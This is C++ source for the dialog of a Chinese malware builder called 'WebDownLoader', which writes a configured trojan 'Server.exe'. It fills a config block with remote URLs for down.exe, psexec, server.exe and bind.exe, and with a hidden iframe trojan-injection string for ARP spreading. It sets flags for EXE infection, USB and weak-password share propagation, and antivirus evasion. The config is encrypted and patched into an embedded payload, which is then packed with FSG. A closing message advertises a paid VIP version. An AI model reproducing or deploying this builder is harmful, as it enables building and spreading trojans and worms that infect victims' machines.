📄 webdownloaderdlg.cpp
字号:
// WebDownLoaderDlg.cpp : implementation file
//
#include "stdafx.h"
#include "WebDownLoader.h"
#include "WebDownLoaderDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
struct MODIFY_DATA
{
char DownFile[100];//下载文件列表
char DownRunURL[100]; //下载pcexec的
char DownRunFileURL[100]; //下载Server
char ArpInject[256]; //Arp感染挂马代码
char DownRunArpFile[100]; //下载Arp URL
char DownRunBindFile[50]; //文件捆绑下载 URL
bool IsWorm;//是否感染EXE启动
bool IsUpan;//是否u盘传播
bool IsShare;//是否弱口令传播
bool IsAnti;//是否反查杀
bool IsARP; //是否ARP感染
int WaitTime;//巡查时间(分钟)
}modify_data =
{
"http://127.0.0.1/down.list",
"http://127.0.0.1/",
"http://127.0.0.1/",
"<iframe src='http://xxx.htm' width=0 height=0>",
"http://127.0.0.1/",
"http://127.0.0.1/",
false,
false,
false,
false,
false,
20,
};
/////////////////////////////////////////////////////////////////////////////
// CAboutDlg dialog used for App About
class CAboutDlg : public CDialog
{
public:
CAboutDlg();
// Dialog Data
//{{AFX_DATA(CAboutDlg)
enum { IDD = IDD_ABOUTBOX };
//}}AFX_DATA
// ClassWizard generated virtual function overrides
//{{AFX_VIRTUAL(CAboutDlg)
public:
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support
//}}AFX_VIRTUAL
// Implementation
protected:
//{{AFX_MSG(CAboutDlg)
//}}AFX_MSG
DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
//{{AFX_DATA_INIT(CAboutDlg)
//}}AFX_DATA_INIT
}
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CAboutDlg)
//}}AFX_DATA_MAP
}
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
//{{AFX_MSG_MAP(CAboutDlg)
// No message handlers
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CWebDownLoaderDlg dialog
CWebDownLoaderDlg::CWebDownLoaderDlg(CWnd* pParent /*=NULL*/)
: CDialog(CWebDownLoaderDlg::IDD, pParent)
{
//{{AFX_DATA_INIT(CWebDownLoaderDlg)
m_Url = _T("http://www.rootkit.com.cn/down.exe");
m_Upan = TRUE;
m_Worm = FALSE;
m_Share = TRUE;
m_Reg = TRUE;
m_Anti = TRUE;
m_Time = 1;
m_IsCompress = FALSE;
//}}AFX_DATA_INIT
}
void CWebDownLoaderDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CWebDownLoaderDlg)
DDX_Text(pDX, IDC_URL, m_Url);
DDV_MaxChars(pDX, m_Url, 100);
//DDX_Text(pDX, IDC_COUNT, m_Count);
//DDV_MinMaxInt(pDX, m_Count, 0, 100);
DDX_Check(pDX, IDC_CHECK1, m_Upan);
DDX_Check(pDX, IDC_CHECK2, m_Worm);
DDX_Check(pDX, IDC_CHECK3, m_Share);
DDX_Check(pDX, IDC_CHECK4, m_Reg);
DDX_Check(pDX, IDC_CHECK5, m_Anti);
DDX_Text(pDX, IDC_EDITTIME, m_Time);
DDV_MinMaxInt(pDX, m_Time, 0, 10000);
DDX_Check(pDX, IDC_CHECK6, m_IsCompress);
//}}AFX_DATA_MAP
}
BEGIN_MESSAGE_MAP(CWebDownLoaderDlg, CDialog)
//{{AFX_MSG_MAP(CWebDownLoaderDlg)
ON_WM_QUERYDRAGICON()
ON_EN_CHANGE(IDC_URL, OnChangeUrl)
ON_EN_CHANGE(IDC_EDIT3, OnChangeEdit3)
ON_EN_CHANGE(IDC_EDITTIME, OnChangeEdittime)
//}}AFX_MSG_MAP
ON_COMMAND_RANGE(IDC_CHECK1,IDC_CHECK5,OnCheck)
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CWebDownLoaderDlg message handlers
BOOL CWebDownLoaderDlg::OnInitDialog()
{
CDialog::OnInitDialog();
// Add "About..." menu item to system menu.
// IDM_ABOUTBOX must be in the system command range.
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// Set the icon for this dialog. The framework does this automatically
// when the application's main window is not a dialog
SetIcon(m_hIcon, TRUE); // Set big icon
SetIcon(m_hIcon, FALSE); // Set small icon
SetDlgItemText(IDC_URL, "http://www.8r1.cn/down.exe");
SetDlgItemText(IDC_EDIT3, "http://www.8r1.cn/psexec.exe");
SetDlgItemText(IDC_EDIT4, "http://www.8r1.cn/server.exe");
SetDlgItemText(IDC_EDIT5, "<iframe src='http://www.8r1.cn/muma.htm' width=0 height=0>");
SetDlgItemText(IDC_EDIT1, "http://www.8r1.cn");
SetDlgItemText(IDC_EDIT6, "http://www.8r1.cn/bind.exe");
// TODO: Add extra initialization here
return TRUE; // return TRUE unless you set the focus to a control
}
void CWebDownLoaderDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
else
{
CDialog::OnSysCommand(nID, lParam);
}
}
// If you add a minimize button to your dialog, you will need the code below
// to draw the icon. For MFC applications using the document/view model,
// this is automatically done for you by the framework.
void CWebDownLoaderDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // device context for painting
SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);
// Center icon in client rectangle
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// Draw the icon
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialog::OnPaint();
}
}
// The system calls this to obtain the cursor to display while the user drags
// the minimized window.
HCURSOR CWebDownLoaderDlg::OnQueryDragIcon()
{
return (HCURSOR) m_hIcon;
}
int SplitFilePath(CString strFilePath,CString &strOutFileName)
{
CString sSplitFlag = "/";
int nPos = -1;
int nIndex = -1;
while(((nPos=strFilePath.Find(sSplitFlag,nPos + 1)) != -1))
{
nIndex = nPos;
}
if(nIndex == -1) return -1;
int nFilePathLen = strFilePath.GetLength();
if( nFilePathLen - nIndex < 4) return -2;
strOutFileName = strFilePath.Right(nFilePathLen - nIndex - 1);
return 0;
}
/*加/解密函数*/
void EncryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
unsigned long i;
char *p;
p = szKey;
for(i = 0; i < nLen; i++) {
if(!(*p))
p = szKey;
*szRec ^= *p;
*szRec += *p;
szRec++;
p++;
}
}
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
unsigned long i;
char *p;
p = szKey;
for(i = 0; i < nLen; i++) {
if(!(*p))
p = szKey;
*szRec -= *p;
*szRec++ ^= *p++;
}
}
void CWebDownLoaderDlg::OnOK()
{
char strURL[100], strMuMaURL[100], strArpStr[256], strdownfile[100], strDownRunArpFile[100],
strDownBindFile[50];
UpdateData();
{
GetDlgItemText(IDC_URL, strdownfile, 100);
memset(modify_data.DownFile, 0, 100);
sprintf(modify_data.DownFile, "%s", strdownfile);
modify_data.WaitTime=m_Time;
//读取
GetDlgItemText(IDC_EDIT3, strURL, 100);
memset(modify_data.DownRunURL, 0, 100);
sprintf(modify_data.DownRunURL, "%s", strURL);
GetDlgItemText(IDC_EDIT4, strMuMaURL, 100);
memset(modify_data.DownRunFileURL, 0, 100);
sprintf(modify_data.DownRunFileURL, "%s", strMuMaURL);
GetDlgItemText(IDC_EDIT5, strArpStr, 256);
memset(modify_data.ArpInject, 0, 256);
sprintf(modify_data.ArpInject, "%s", strArpStr);
GetDlgItemText(IDC_EDIT1, strDownRunArpFile, 100);
memset(modify_data.DownRunArpFile, 0, 100);
sprintf(modify_data.DownRunArpFile, "%s", strDownRunArpFile);
GetDlgItemText(IDC_EDIT6, strDownBindFile, 50);
memset(modify_data.DownRunBindFile, 0, 50);
sprintf(modify_data.DownRunBindFile, "%s", strDownBindFile);
EncryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"1314");
}
CreateServer();
//解压出捆绑感染
CreateBindFile();
if (m_IsCompress)
{
ComPress();
}
MessageBox("已经成功生成服务端:\nServer.exe [你的服务端]\n\n欢迎购买Vip版!\n\n演示版不支持:感染EXE&ARP网段挂马的修改\n\n\n此程序为编程研究,用户非法使用带来一切问题后过自负!","注意:");
}
void CWebDownLoaderDlg::OnCheck(UINT nID)
{
UpdateData();
switch(nID)
{
case IDC_CHECK1: //arp挂马
modify_data.IsARP=m_Upan;
break;
case IDC_CHECK2: //感染exe
modify_data.IsWorm=m_Worm;
break;
case IDC_CHECK3: //弱口令
modify_data.IsShare=m_Share;
break;
case IDC_CHECK4: //u盘传播
modify_data.IsUpan=m_Reg;
break;
case IDC_CHECK5: //反查杀
modify_data.IsAnti=m_Anti;
break;
}
}
void CWebDownLoaderDlg::CreateBindFile()
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize,dwWritten;
LPBYTE p;
HANDLE hFile;
char strDownBindFile[50];
CString BindFileName, BindFilePath;
GetDlgItemText(IDC_EDIT6, strDownBindFile, 50);
BindFilePath = strDownBindFile;
SplitFilePath(BindFilePath, BindFileName);
// 查找所需的资源
hResInfo = FindResource(NULL,MAKEINTRESOURCE(IDR_BIND),"EXE");
if(hResInfo == NULL) return;
// 获得资源尺寸
dwSize = SizeofResource(NULL,hResInfo);
// 装载资源
hResData = LoadResource(NULL,hResInfo);
if(hResData == NULL) return;
// 为数据分配空间
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL) return;
// 复制资源数据
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
TCHAR szText[50];
memset(szText,0,sizeof(szText));
memcpy(szText, strDownBindFile, strlen(strDownBindFile));
CopyMemory((LPVOID)(p + 0x6028), (LPCVOID)szText, 50); //A
char Path[256], CreateFileName[256];
GetCurrentDirectory(256, Path);
memset(CreateFileName, 0, 256);
sprintf(CreateFileName, "%s\\%s", Path, BindFileName);
DeleteFile(CreateFileName);
hFile = CreateFile(CreateFileName,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
if(hFile == NULL) return;
WriteFile(hFile,(LPVOID)p,dwSize,&dwWritten,NULL);
CloseHandle(hFile);
return;
}
void CWebDownLoaderDlg::CreateServer()
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize,dwWritten;
LPBYTE p;
HANDLE hFile;
// 查找所需的资源
hResInfo = FindResource(NULL,MAKEINTRESOURCE(IDR_EXE),"EXE");
if(hResInfo == NULL) return;
// 获得资源尺寸
dwSize = SizeofResource(NULL,hResInfo);
// 装载资源
hResData = LoadResource(NULL,hResInfo);
if(hResData == NULL) return;
// 为数据分配空间
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL) return;
// 复制资源数据
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
CopyMemory((LPVOID)(p + 0x7288), (LPCVOID)&modify_data,sizeof(MODIFY_DATA));//填充配置信息
char Path[256];
GetCurrentDirectory(256, Path);
strcat(Path,"\\Server.exe");
DeleteFile(Path);
hFile = CreateFile(Path,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
if(hFile == NULL) return;
WriteFile(hFile,(LPVOID)p,dwSize,&dwWritten,NULL);
CloseHandle(hFile);
return;
}
void CWebDownLoaderDlg::ComPress()
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize,dwWritten;
LPBYTE p;
HANDLE hFile;
// 查找所需的资源
hResInfo = FindResource(NULL,MAKEINTRESOURCE(IDR_FSG),"EXE");
if(hResInfo == NULL) return;
// 获得资源尺寸
dwSize = SizeofResource(NULL,hResInfo);
// 装载资源
hResData = LoadResource(NULL,hResInfo);
if(hResData == NULL) return;
// 为数据分配空间
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL) return;
// 复制资源数据
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
char Path[256];
GetCurrentDirectory(256, Path);
strcat(Path,"\\fsg.exe");
DeleteFile(Path);
hFile = CreateFile(Path,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
if(hFile == NULL) return;
WriteFile(hFile,(LPVOID)p,dwSize,&dwWritten,NULL);
CloseHandle(hFile);
ShellExecute(this->m_hWnd,"open",Path,"Server.exe","",SW_HIDE);
}
BOOL CWebDownLoaderDlg::DestroyWindow()
{
// TODO: Add your specialized code here and/or call the base class
char Path[256];
GetCurrentDirectory(256, Path);
strcat(Path,"\\fsg.exe");
DeleteFile(Path);
return CDialog::DestroyWindow();
}
void CWebDownLoaderDlg::OnChangeUrl()
{
// TODO: If this is a RICHEDIT control, the control will not
// send this notification unless you override the CDialog::OnInitDialog()
// function and call CRichEditCtrl().SetEventMask()
// with the ENM_CHANGE flag ORed into the mask.
// TODO: Add your control notification handler code here
}
void CWebDownLoaderDlg::OnChangeEdit3()
{
// TODO: If this is a RICHEDIT control, the control will not
// send this notification unless you override the CDialog::OnInitDialog()
// function and call CRichEditCtrl().SetEventMask()
// with the ENM_CHANGE flag ORed into the mask.
// TODO: Add your control notification handler code here
}
void CWebDownLoaderDlg::OnChangeEdittime()
{
// TODO: If this is a RICHEDIT control, the control will not
// send this notification unless you override the CDialog::OnInitDialog()
// function and call CRichEditCtrl().SetEventMask()
// with the ENM_CHANGE flag ORed into the mask.
// TODO: Add your control notification handler code here
}
void CWebDownLoaderDlg::OnCancel()
{
CDialog::OnCancel();
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -